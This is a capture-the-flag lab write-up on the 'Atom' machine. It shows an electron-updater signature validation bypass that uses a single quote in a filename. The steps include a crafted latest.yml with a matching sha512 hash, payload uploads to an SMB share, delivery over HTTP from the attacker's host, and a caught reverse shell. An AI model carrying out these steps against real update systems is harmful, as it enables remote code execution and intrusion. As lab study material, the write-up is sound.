InfoSec LAB

Atom_Exploitation

Created: 4 min read

Signature Validation Bypass to RCE

The Heel application has been evaluated to be subjected to the “Signature Validation Bypass” vulnerability that could potentially lead to Remote Code Execution via OS Command Injection. The vulnerability is attributed to the outdated installation of the electron-builder package along with the electron-updater module present within the application.

The PDF file found in one of the SMB shares outlines the QA procedure, which includes what appears to be a scheduled task that automates the update process by fetching an update file from one of the 3 “client” directories in the publicly available SMB server.

The aforementioned update file refers to the latest.yml file, which evidently has revealed itself during the initialization of the Heel application.

the official documentation of electron-builder does also provide an additional evidence

Checking back at the article found during vulnerability research shows an example for exploitation Signature Verification Bypass is achieved via invoking a parsing error by inserting special characters such as a single quote(')

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ ll u\'pdate.exe 
8.0K -rw-r--r-- 1 kali kali 7.0K Jan  9 11:49 "u'pdate.exe"

A payload has been generated and saved to the u\'pdate.exe file, that contains a single quote (') in the filename

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ shasum -a 512  u\'pdate.exe | cut -d ' ' -f1 | xxd -r -p | base64 | tr -d '\n'
xCaHde9kL6wS04fJqYfY/b7rQFScDhUogOl9q0vXENAYNEbUOsiaDiI1XqTKnRwcRag39LTTsIdySK48MAFMCQ==

I will now calculate the sha512 hash of the payload This must be supplied to the latest.yml file

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ cat latest.yml      
version: 1.2.3
path: u'pdate.exe
sha512: xCaHde9kL6wS04fJqYfY/b7rQFScDhUogOl9q0vXENAYNEbUOsiaDiI1XqTKnRwcRag39LTTsIdySK48MAFMCQ==

Then I can create the latest.yml file

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ smbclient //$IP/Software_Updates
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> cd client2\
smb: \client2\> put latest.yml 
putting file latest.yml as \client2\latest.yml (1.5 kb/s) (average 1.5 kb/s)
smb: \client2\> put u'pdate.exe 
putting file u'pdate.exe as \client2\u'pdate.exe (83.3 kb/s) (average 42.7 kb/s)
smb: \client2\> ls
  .                                   D        0  Tue Jan  9 12:56:14 2024
  ..                                  D        0  Tue Jan  9 12:56:14 2024
  latest.yml                          A      130  Tue Jan  9 12:56:12 2024
  u'pdate.exe                         A     7168  Tue Jan  9 12:56:14 2024
 
		4413951 blocks of size 4096. 1318637 blocks available

Then both payload and latest.yml files must be uploaded to one of the 3 “client” directories accordingly

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.237] 62035
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
 whoami
atom\jason
 
C:\WINDOWS\system32> hostname
 hostname
ATOM
 
C:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
   Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
   Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.237
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
                                       10.10.10.2

Initial Foothold established to the target system as the jason user via Signature Validation Bypass to RCE

Over HTTP

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ cat latest.yml 
version: 1.2.3
path: http://10.10.14.23/u'pdate.exe
sha512: xCaHde9kL6wS04fJqYfY/b7rQFScDhUogOl9q0vXENAYNEbUOsiaDiI1XqTKnRwcRag39LTTsIdySK48MAFMCQ==

Payload delivery can be done over HTTP as well

smb: \client1\> put latest.yml 
putting file latest.yml as \client1\latest.yml (1.7 kb/s) (average 15.6 kb/s)

and only place the latest.yml file

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ simplehttp . 80
serving http on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [09/jan/2024 12:06:16] "GET /u%27pdate.exe HTTP/1.1" 200 -

The target’s vulnerable electron-builder instance fetches the payload over HTTP and executes it

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.237] 62072
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
 
c:\WINDOWS\system32> whoami
 whoami
atom\jason
 
c:\WINDOWS\system32> hostname
 hostname
ATOM
 
c:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
   temporary ipv6 address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
   link-local ipv6 address . . . . . : fe80::a113:8872:d58a:1862%6
   ipv4 address. . . . . . . . . . . : 10.10.10.237
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
                                       10.10.10.2

Interactive Graph View

Backlinks